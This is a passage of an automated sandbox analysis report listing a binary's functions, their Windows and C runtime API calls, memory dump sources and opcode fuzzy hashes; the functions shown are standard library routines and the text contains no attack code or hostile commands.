                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9361EA70D04248ABDF20AF68DD6A7ADFB74EB05310F54429EE405A73C2D7754A888FE2
                                                                                                                                                                                                                                                    Function 00DFC9EB Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2389300866.0000000000DD1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00DD0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389268559.0000000000DD0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389361077.0000000000E21000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389397591.0000000000E36000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389434516.0000000000E3D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_dd0000_defnur.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AdjustPointer
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1740715915-0
                                                                                                                                                                                                                                                    • Opcode ID: 457a56b5d173704a50fa4166de26fa055ebe6de5162d78ea517c02d3ed0aedc7
                                                                                                                                                                                                                                                    • Instruction ID: 13be02a0e16d3e7f28434c141bc12b98a0d6c1f92f00154d99d51f609ca9b053
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 457a56b5d173704a50fa4166de26fa055ebe6de5162d78ea517c02d3ed0aedc7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A151037661020EAFDB29CF14DA82BBA73A4EF44300F1AD029EE5557190D731ED61CBB0
                                                                                                                                                                                                                                                    Function 00DD9A20 Relevance: 6.2, APIs: 4, Instructions: 155libraryloaderCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetVersionExW.KERNEL32(0000011C,?,E7FD9D7B), ref: 00DD9A99
                                                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00DD9B00
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00DD9B07
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2389300866.0000000000DD1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00DD0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389268559.0000000000DD0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389361077.0000000000E21000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389397591.0000000000E36000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389434516.0000000000E3D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_dd0000_defnur.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AddressHandleModuleProcVersion
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3310240892-0
                                                                                                                                                                                                                                                    • Opcode ID: d6556b983fadf66b6ce71218c8af385407f4bf96bb81694864560fa67704fb8e
                                                                                                                                                                                                                                                    • Instruction ID: a3d36627389994f8c67b2fb69d3befe601cd70dc8cdbac1928eb955139d9b4d7
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d6556b983fadf66b6ce71218c8af385407f4bf96bb81694864560fa67704fb8e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F3510571D042089BDB24EB68DD997EDFBB4EF45310F51429AE408A7391EB358A84CBB1
                                                                                                                                                                                                                                                    Function 00DF5D40 Relevance: 6.1, APIs: 4, Instructions: 141COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 00DF5E17
                                                                                                                                                                                                                                                    • std::_Rethrow_future_exception.LIBCPMT ref: 00DF5E69
                                                                                                                                                                                                                                                    • std::_Rethrow_future_exception.LIBCPMT ref: 00DF5E79
                                                                                                                                                                                                                                                      • Part of subcall function 00DD3A60: __Mtx_unlock.LIBCPMT ref: 00DD3B54
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2389300866.0000000000DD1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00DD0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389268559.0000000000DD0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389361077.0000000000E21000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389397591.0000000000E36000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389434516.0000000000E3D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_dd0000_defnur.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Mtx_unlockRethrow_future_exceptionstd::_
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3298230783-0
                                                                                                                                                                                                                                                    • Opcode ID: 30286d28e5070e1d8f2010df123a25f3accbe13cd6a9d9fb9e0749e13d813dab
                                                                                                                                                                                                                                                    • Instruction ID: 0c95965e5e42d6ab93f93a69733a163ae20f6f7cb292d4bd74a6f0a4ecfd2512
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 30286d28e5070e1d8f2010df123a25f3accbe13cd6a9d9fb9e0749e13d813dab
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DA410B71D0470C6BCB10EBA4E806BBEBBE8DF15700F04856EF64693642EB31A644C7B2
                                                                                                                                                                                                                                                    Function 00DD2F00 Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2389300866.0000000000DD1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00DD0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389268559.0000000000DD0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389361077.0000000000E21000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389397591.0000000000E36000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389434516.0000000000E3D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_dd0000_defnur.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Mtx_unlock$Cnd_broadcastCurrentThread
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3264154886-0
                                                                                                                                                                                                                                                    • Opcode ID: 4e8459135097dfa2d09067ead6f0074458e54c63a0b11a365ce96e7a9eaabc00
                                                                                                                                                                                                                                                    • Instruction ID: 6a49a7fcb60b54510d7b689bc5b7169d0f6690fff838d5243847d151bc8b53e9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4e8459135097dfa2d09067ead6f0074458e54c63a0b11a365ce96e7a9eaabc00
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D6419FB1A016159FCB21DF25C844B6AF7E8FF15314F04852AE91AC7751EB31E904CBE2
                                                                                                                                                                                                                                                    Function 00E0EED3 Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 00DFE878: _free.LIBCMT ref: 00DFE886
                                                                                                                                                                                                                                                      • Part of subcall function 00E0E37F: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,00E0C502,?,00000000,00000000), ref: 00E0E42B
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00E0EF3B
                                                                                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 00E0EF42
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 00E0EF81
                                                                                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 00E0EF88
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2389300866.0000000000DD1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00DD0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389268559.0000000000DD0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389361077.0000000000E21000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389397591.0000000000E36000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389434516.0000000000E3D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_dd0000_defnur.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 167067550-0
                                                                                                                                                                                                                                                    • Opcode ID: 0ab2b02a6f5644e6822d214d0a7b6b6f25fd78d9bf7e59a84aa2f453eddc5892
                                                                                                                                                                                                                                                    • Instruction ID: f68935bc4b49151c93bae1a9024abf0e6fb0b2166113efd4ec09de4c9d932ed8
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0ab2b02a6f5644e6822d214d0a7b6b6f25fd78d9bf7e59a84aa2f453eddc5892
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4621A47170421A6FDB30AF658C8096B7BEEEF103687109968F968F72D1D731ED8097A0
                                                                                                                                                                                                                                                    Function 00E06CF0 Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00DFE157,?,?,?,?,00DFEFF2,?), ref: 00E06CF5
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E06D52
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E06D88
                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,00DFE157,?,?,?,?,00DFEFF2,?), ref: 00E06D93
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2389300866.0000000000DD1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00DD0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389268559.0000000000DD0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389361077.0000000000E21000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389397591.0000000000E36000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389434516.0000000000E3D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_dd0000_defnur.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorLast_free
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2283115069-0
                                                                                                                                                                                                                                                    • Opcode ID: 774c5e53a58d4b2fe0149446410038bd84b30a263cfa5f65e131394da4ae41e6
                                                                                                                                                                                                                                                    • Instruction ID: f3d8e1fb8b52e74d3f2f6cd1b01102a8912d48ff94cd08e305d73bb0c7a9c9c1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 774c5e53a58d4b2fe0149446410038bd84b30a263cfa5f65e131394da4ae41e6
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D7114C323002053ED61037756C85F6B2AAADBC03797666338F5A0B61F2ED62CCD94170
                                                                                                                                                                                                                                                    Function 00DF7F88 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 00DF7EE9: GetModuleHandleExW.KERNEL32(00000002,00000000,?,?,?,00DF7F3B,00000014,?,00DF7F7C,00000014,?,00DD2D32,00000000,00000014), ref: 00DF7EF5
                                                                                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 00DF7FCE
                                                                                                                                                                                                                                                    • FreeLibraryWhenCallbackReturns.KERNEL32(?,00000000,E7FD9D7B,?,?,?,00E187B0,000000FF), ref: 00DF7FF6
                                                                                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 00DF8031
                                                                                                                                                                                                                                                    • __Cnd_broadcast.LIBCPMT ref: 00DF8042
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2389300866.0000000000DD1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00DD0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389268559.0000000000DD0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389361077.0000000000E21000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389397591.0000000000E36000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389434516.0000000000E3D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_dd0000_defnur.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Mtx_unlock$CallbackCnd_broadcastFreeHandleLibraryModuleReturnsWhen
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 420990631-0
                                                                                                                                                                                                                                                    • Opcode ID: 4546e2eaf3bfb4b4ae90c4caa8ebf3a1a5e5c2a5bcffa0e276e987e263ac227c
                                                                                                                                                                                                                                                    • Instruction ID: ef7e6847754c9f0a205475cb07b7c7045c6ce96fc3ed79fda21276c22ed855b2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4546e2eaf3bfb4b4ae90c4caa8ebf3a1a5e5c2a5bcffa0e276e987e263ac227c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1A112C3650460EABCA216B61EC06A7FBBA9EF50710F06881BFE01A3651CF359801C671
                                                                                                                                                                                                                                                    Function 00E06E47 Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00E01187,00DD2397), ref: 00E06E4C
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E06EA9
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E06EDF
                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,00000006,000000FF,?,00E01187,00DD2397), ref: 00E06EEA
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2389300866.0000000000DD1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00DD0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389268559.0000000000DD0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389361077.0000000000E21000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389397591.0000000000E36000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389434516.0000000000E3D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_dd0000_defnur.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorLast_free
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2283115069-0
                                                                                                                                                                                                                                                    • Opcode ID: ee9dcf8f55a027007fcc7b6bb1572dc0e30833a524af17c6b33ecc1f5907d6a9
                                                                                                                                                                                                                                                    • Instruction ID: 2591290193b6793bf16ea633e4edf1cf76cdcdf0c403c181a80427c92a4fcb3d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ee9dcf8f55a027007fcc7b6bb1572dc0e30833a524af17c6b33ecc1f5907d6a9
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A61108362003043EEB112775EC85F6B39AA9BC07787652338F5A4F61F2DE62CDE64160
                                                                                                                                                                                                                                                    Function 00E09DBF Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetFullPathNameW.KERNEL32(00000020,00000000,?,00000000,?,00000000,?,00E158B7,?,?,?,00000020,00000001), ref: 00E09DD5
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00E158B7,?,?,?,00000020,00000001), ref: 00E09DDF
                                                                                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 00E09DE6
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2389300866.0000000000DD1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00DD0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389268559.0000000000DD0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389361077.0000000000E21000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389397591.0000000000E36000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389434516.0000000000E3D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_dd0000_defnur.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorFullLastNamePath__dosmaperr
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2398240785-0
                                                                                                                                                                                                                                                    • Opcode ID: c4b78aa745e9ee31ddf9ebbdef1e907ebc33239b130f08d4106caed0f949d3fa
                                                                                                                                                                                                                                                    • Instruction ID: 364d47c7c1389d8184ad2ce1b3a8aed047423cf2a9513fdb6b304c5a361f470e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c4b78aa745e9ee31ddf9ebbdef1e907ebc33239b130f08d4106caed0f949d3fa
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 35F08132601115BBCB205FA6DC08997FFAAFF447A43049551F619E7162DB31EDA2CBD0
                                                                                                                                                                                                                                                    Function 00E09E28 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetFullPathNameW.KERNEL32(00000020,00000000,?,00000000,?,00000000,?,00E15842,?,?,?,?,00000020,00000001), ref: 00E09E3E
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00E15842,?,?,?,?,00000020,00000001), ref: 00E09E48
                                                                                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 00E09E4F
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2389300866.0000000000DD1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00DD0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389268559.0000000000DD0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389361077.0000000000E21000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389397591.0000000000E36000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389434516.0000000000E3D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_dd0000_defnur.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorFullLastNamePath__dosmaperr
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2398240785-0
                                                                                                                                                                                                                                                    • Opcode ID: 73568687a41c708d21afd03d36d2815fa54fdd41b7b9be48fe7a44551c1591b4
                                                                                                                                                                                                                                                    • Instruction ID: 3c7a9a172bda579b6afbd5ef1d66cfc225a18801ea14675ac6f841e195147259
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 73568687a41c708d21afd03d36d2815fa54fdd41b7b9be48fe7a44551c1591b4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 03F06D32200115BBCF209FA2CC0899BBFA9FF457A03049551F619E60A2CB31EDA2D7D0
                                                                                                                                                                                                                                                    Function 00E1741A Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,00E13F02,00000000,00000001,00000000,00000000,?,00E07A66,?,?,00000000), ref: 00E17431
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00E13F02,00000000,00000001,00000000,00000000,?,00E07A66,?,?,00000000,?,00000000,?,00E07FB2,?), ref: 00E1743D
                                                                                                                                                                                                                                                      • Part of subcall function 00E17403: CloseHandle.KERNEL32(FFFFFFFE,00E1744D,?,00E13F02,00000000,00000001,00000000,00000000,?,00E07A66,?,?,00000000,?,00000000), ref: 00E17413
                                                                                                                                                                                                                                                    • ___initconout.LIBCMT ref: 00E1744D
                                                                                                                                                                                                                                                      • Part of subcall function 00E173C5: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00E173F4,00E13EEF,00000000,?,00E07A66,?,?,00000000,?), ref: 00E173D8
                                                                                                                                                                                                                                                    • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,00E13F02,00000000,00000001,00000000,00000000,?,00E07A66,?,?,00000000,?), ref: 00E17462
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2389300866.0000000000DD1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00DD0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389268559.0000000000DD0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389361077.0000000000E21000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389397591.0000000000E36000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389434516.0000000000E3D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_dd0000_defnur.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2744216297-0
                                                                                                                                                                                                                                                    • Opcode ID: 5c2591e40205db2a42c8c074999467ddfb9704a3680714fde688872e647c3083
                                                                                                                                                                                                                                                    • Instruction ID: 72afff594a2813b098da75fdf9df6b2e63193f4062e4f2d013d554faac080b96
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5c2591e40205db2a42c8c074999467ddfb9704a3680714fde688872e647c3083
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EBF03036504159BFCF221FE2DC08ACA3FB6FB187A1B014054FA28E5130D6328D61AB90
                                                                                                                                                                                                                                                    Function 00DF9A8A Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • SleepConditionVariableCS.KERNEL32(?,00DF9A27,00000064,?,?,?,00DD2E1C,00E3CDC4), ref: 00DF9AAD
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(00E38FA8,00DD2E1C,?,00DF9A27,00000064,?,?,?,00DD2E1C,00E3CDC4), ref: 00DF9AB7
                                                                                                                                                                                                                                                    • WaitForSingleObjectEx.KERNEL32(00DD2E1C,00000000,?,00DF9A27,00000064,?,?,?,00DD2E1C,00E3CDC4), ref: 00DF9AC8
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(00E38FA8,?,00DF9A27,00000064,?,?,?,00DD2E1C,00E3CDC4), ref: 00DF9ACF
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2389300866.0000000000DD1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00DD0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389268559.0000000000DD0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389361077.0000000000E21000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389397591.0000000000E36000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389434516.0000000000E3D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_dd0000_defnur.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3269011525-0
                                                                                                                                                                                                                                                    • Opcode ID: c7c0f31bfa381b4e721c1769cfc2909d24a070af2a9486f0ca1097c725888a58
                                                                                                                                                                                                                                                    • Instruction ID: 6310763ece3b34e16c59cbff6bcc3dd80f775e6fc1b8840cb5dbbbc22541a563
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c7c0f31bfa381b4e721c1769cfc2909d24a070af2a9486f0ca1097c725888a58
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 38E09236A4132CAFCB211F42ED0DA9D7E26EF24B62F094051FA0976160CEB51A158FD4
                                                                                                                                                                                                                                                    Function 00E04629 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E04632
                                                                                                                                                                                                                                                      • Part of subcall function 00E080D6: HeapFree.KERNEL32(00000000,00000000,?,00E1107C,?,00000000,?,?,?,00E1131F,?,00000007,?,?,00E117C4,?), ref: 00E080EC
                                                                                                                                                                                                                                                      • Part of subcall function 00E080D6: GetLastError.KERNEL32(?,?,00E1107C,?,00000000,?,?,?,00E1131F,?,00000007,?,?,00E117C4,?,?), ref: 00E080FE
